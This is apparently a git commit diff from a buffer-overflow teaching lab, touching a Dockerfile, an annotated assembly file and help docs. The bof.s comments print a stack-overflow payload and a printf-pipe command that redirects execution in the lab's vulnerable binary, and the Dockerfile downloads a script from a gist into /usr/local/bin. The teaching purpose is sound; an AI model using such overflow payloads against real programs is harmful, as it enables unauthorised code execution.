docs
This commit is contained in:
parent
5f83e809ab
commit
fe453841be
@ -4,7 +4,6 @@ RUN mkdir /lab
|
|||||||
|
|
||||||
RUN bash -c "chmod +rwx /lab"
|
RUN bash -c "chmod +rwx /lab"
|
||||||
|
|
||||||
COPY Makefile /lab/Makefile
|
|
||||||
COPY bof.elf /lab/bof.elf
|
COPY bof.elf /lab/bof.elf
|
||||||
COPY bof.s /lab/bof.s
|
COPY bof.s /lab/bof.s
|
||||||
|
|
||||||
@ -15,6 +14,7 @@ RUN DEBIAN_FRONTEND=noninteractive apt install --yes curl sudo openssh-server ra
|
|||||||
RUN curl https://gist.githubusercontent.com/bfu4/c8d252f36c9aeb30d98a133e1cf922e3/raw/ae93e86e910deef429716daf325552f1d74bb82b/iuadd --output /usr/local/bin/iuadd
|
RUN curl https://gist.githubusercontent.com/bfu4/c8d252f36c9aeb30d98a133e1cf922e3/raw/ae93e86e910deef429716daf325552f1d74bb82b/iuadd --output /usr/local/bin/iuadd
|
||||||
RUN chmod +x /usr/local/bin/iuadd
|
RUN chmod +x /usr/local/bin/iuadd
|
||||||
|
|
||||||
|
RUN cd lab
|
||||||
|
|
||||||
EXPOSE 22/tcp
|
EXPOSE 22/tcp
|
||||||
|
|
||||||
|
6
bof.s
6
bof.s
@ -46,7 +46,7 @@
|
|||||||
# |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
|
# |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
|
||||||
# | / | / | / | / | / | / | / | / | 61 | 61 | 61 | 61 | 61 | 61 | 61 | 61 | #
|
# | / | / | / | / | / | / | / | / | 61 | 61 | 61 | 61 | 61 | 61 | 61 | 61 | #
|
||||||
# |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
|
# |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
|
||||||
# | x | x | x | x | x | x | x | x | 6a | 11 | 40 | 00 | <-- saved bp (1) | #
|
# | x | x | x | x | x | x | x | x | 63 | 10 | 40 | 00 | <-- saved bp (1) | #
|
||||||
# |___|___|___|___|___|___|___|___|____|____|____|____|___________________| #
|
# |___|___|___|___|___|___|___|___|____|____|____|____|___________________| #
|
||||||
# #
|
# #
|
||||||
# Since we don't really care what is in the memory where the x's are, we can put anything there. We want #
|
# Since we don't really care what is in the memory where the x's are, we can put anything there. We want #
|
||||||
@ -55,9 +55,9 @@
|
|||||||
# follow that format. Instead of writing {0x40, 0x10, 0x47} to stdin, we will write {0x47, 0x10, 0x40} to #
|
# follow that format. Instead of writing {0x40, 0x10, 0x47} to stdin, we will write {0x47, 0x10, 0x40} to #
|
||||||
# be able to write 0x401047 (the address we want to jump to). #
|
# be able to write 0x401047 (the address we want to jump to). #
|
||||||
#
|
#
|
||||||
# This allows us to craft the final payload: "aaaaaaaaaaaaaaaa\x47\x11\x40". #
|
# This allows us to craft the final payload: "aaaaaaaaaaaaaaaa\x47\x10\x40". #
|
||||||
#---------------------------------------------------------------------------------------------------------------#
|
#---------------------------------------------------------------------------------------------------------------#
|
||||||
# Execution: bash -c 'printf "aaaaaaaaaaaaaaaa\x47\x11\x40" | ./bof.elf' #
|
# Execution: bash -c 'printf "aaaaaaaaaaaaaaaa\x47\x10\x40" | ./bof.elf' #
|
||||||
#---------------------------------------------------------------#-----------------------------------------------#
|
#---------------------------------------------------------------#-----------------------------------------------#
|
||||||
nop # #
|
nop # #
|
||||||
leave # END OF FUNCTION #
|
leave # END OF FUNCTION #
|
||||||
|
42
docs/commands.txt
Normal file
42
docs/commands.txt
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
= PROGRAMS
|
||||||
|
|
||||||
|
+-------------------------------------------------------------------------------+
|
||||||
|
| program | flags | args | description |
|
||||||
|
+---------------|---------------|---------------|-------------------------------+
|
||||||
|
| rabin2 | -Ss | ./bof.elf | get symbol information |
|
||||||
|
| | | | like function addresses |
|
||||||
|
+---------------|---------------|---------------|-------------------------------+
|
||||||
|
| r2 | -wAAf | ./bof.elf | analyze a binary (static) |
|
||||||
|
+---------------|---------------|---------------|-------------------------------+
|
||||||
|
| cat | | ./bof.s | read the contents of the |
|
||||||
|
| | | | source file |
|
||||||
|
+---------------|---------------|---------------|-------------------------------+
|
||||||
|
| objdump | -d | ./bof.elf | disassemble a binary |
|
||||||
|
+---------------|---------------|---------------|-------------------------------+
|
||||||
|
| grep | -e | string | grab text where a string |
|
||||||
|
| | | | occurs, non case sensitive |
|
||||||
|
+---------------|---------------|---------------|-------------------------------|
|
||||||
|
| curl | | url | get an http response from |
|
||||||
|
| | | | from the provided url and |
|
||||||
|
| | | | output to stdout or a file |
|
||||||
|
| | | | via the --output=file flag |
|
||||||
|
+---------------|---------------|---------------|-------------------------------+
|
||||||
|
| printf | | string | print the provided string |
|
||||||
|
+---------------|---------------|---------------|-------------------------------+
|
||||||
|
| chmod | +x | ./bof.elf | add execute permission |
|
||||||
|
+---------------|---------------|---------------|-------------------------------|
|
||||||
|
| lldb | | ./bof.elf | execute the program to debug |
|
||||||
|
+-------------------------------------------------------------------------------+
|
||||||
|
|
||||||
|
= UTILITIES
|
||||||
|
|
||||||
|
+-------------------------------------------------------------------------------+
|
||||||
|
| characters (s) | format | use case |
|
||||||
|
+-----------------------|-----------------------|-------------------------------+
|
||||||
|
| | (pipe) | cmd1 | cmd2 | "pipe" the output from cmd1 |
|
||||||
|
| | | into input for cmd2 |
|
||||||
|
+-----------------------|-----------------------|-------------------------------+
|
||||||
|
| ./ | ./<file> | execute a LOCAL (accessable |
|
||||||
|
| | | from the current working |
|
||||||
|
| | | directory) file. |
|
||||||
|
+-------------------------------------------------------------------------------+
|
21
docs/help.txt
Normal file
21
docs/help.txt
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
= HELP
|
||||||
|
|
||||||
|
Feeling stuck? There's actually a cheatsheet!
|
||||||
|
|
||||||
|
|
||||||
|
Command Cheatsheet: <url-here>
|
||||||
|
Binary Source Code: <url-here>
|
||||||
|
|
||||||
|
To get the files, run:
|
||||||
|
|
||||||
|
curl <url> --output <name-your-file-here>
|
||||||
|
|
||||||
|
For example:
|
||||||
|
|
||||||
|
+-------------------------------------------------------+
|
||||||
|
| curl <url>/bof.s --output ./bof.s |
|
||||||
|
| |
|
||||||
|
| and |
|
||||||
|
| |
|
||||||
|
| curl <url>/cheatsheet.txt --output ./cheatsheet.txt |
|
||||||
|
+-------------------------------------------------------+
|
Loading…
Reference in New Issue
Block a user